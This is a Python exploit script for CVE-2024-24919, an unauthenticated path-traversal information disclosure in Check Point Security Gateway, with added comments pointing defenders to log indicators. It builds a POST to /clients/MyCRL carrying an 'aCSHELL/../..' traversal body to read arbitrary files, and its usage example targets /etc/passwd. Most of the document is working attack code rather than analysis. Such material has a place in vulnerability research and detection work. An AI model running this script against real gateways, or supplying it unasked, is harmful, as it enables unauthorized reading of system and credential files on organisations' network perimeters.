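# Exploit Title: Check Point Security Gateway - Information Disclosure (Unauthenticated)
# Exploit Author: Yesith Alvarez
# Vendor Homepage: https://support.checkpoint.com/results/sk/sk182336
# Version: R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, R81.20
# CVE : CVE-2024-24919
#
# Defender notes: the advisory linked above (sk182336) is the vendor's
# reference for this CVE. The only request this script generates is a POST to
# /clients/MyCRL whose body starts with "aCSHELL/" followed by "../"
# sequences, so that is the shape to look for in gateway and proxy logs.

import json
import sys

from requests import Request, Session


def title():
    """Print the author's banner: an ASCII-art CVE id and contact links."""
    # Raw string: the art is full of backslashes that are not valid escape
    # sequences, which recent Python versions warn about in a normal literal.
    # NOTE(review): the listing this was recovered from had its whitespace
    # collapsed, so the rows keep the original characters but not the original
    # column alignment.
    print(r'''
 _______ ________ ___ ___ ___ _ _ ___ _ _ ___ __ ___
/ ____\ \ / / ____| |__ \ / _ \__ \| || | |__ \| || | / _ \/_ |/ _ \
| | \ \ / /| |__ ______ ) | | | | ) | || |_ ______ ) | || || (_) || | (_) |
| | \ \/ / | __|______/ /| | | |/ /|__ _|______/ /|__ _\__, || |\__, |
| |____ \ / | |____ / /_| |_| / /_ | | / /_ | | / / | | / /
\_____| \/ |______| |____|\___/____| |_| |____| |_| /_/ |_| /_/

Author: Yesith Alvarez
Github: https://github.com/yealvarez
Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
''')


def exploit(url, path):
    """Send the single CVE-2024-24919 test request and print its metadata.

    The request is a POST to ``<url>/clients/MyCRL`` whose body is the fixed
    prefix ``aCSHELL/`` plus a run of ``../`` segments, followed by ``path``.
    Only the prepared request headers, the target URL, the response headers
    and the status code are printed; the response body is not printed.

    Args:
        url: Base URL of the gateway, scheme included and without a trailing
            slash (the endpoint path is appended as-is).
        path: Absolute file path appended after the traversal prefix.

    Exceptions raised by ``requests`` (timeout, connection failure) are not
    caught here and propagate to the caller.
    """
    url = url + '/clients/MyCRL'
    data = "aCSHELL/../../../../../../../../../../.." + path
    # The User-Agent is a hard-coded browser string, so on its own it is not a
    # reliable indicator; the endpoint and body prefix are.
    headers = {
        'Connection': 'keep-alive',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0',
    }
    prepped = Request('POST', url, data=data, headers=headers).prepare()
    # The context manager closes the session's connection pool even if send()
    # raises; the original never closed it.
    with Session() as s:
        # verify=False: the gateway's TLS certificate is not validated, so the
        # identity of the responding host is not checked.
        resp = s.send(prepped, verify=False, timeout=15)
    print(prepped.headers)
    print(url)
    print(resp.headers)
    print(resp.status_code)


if __name__ == '__main__':
    title()
    if len(sys.argv) < 3:
        print('[+] USAGE: python3 %s https://<target_url> path\n' % (sys.argv[0]))
        print('[+] EXAMPLE: python3 %s https://192.168.0.10 "/etc/passwd"\n' % (sys.argv[0]))
        # sys.exit instead of the site-provided exit() helper, and a non-zero
        # status so a wrapper can tell "bad usage" from a completed run.
        sys.exit(1)
    exploit(sys.argv[1], sys.argv[2])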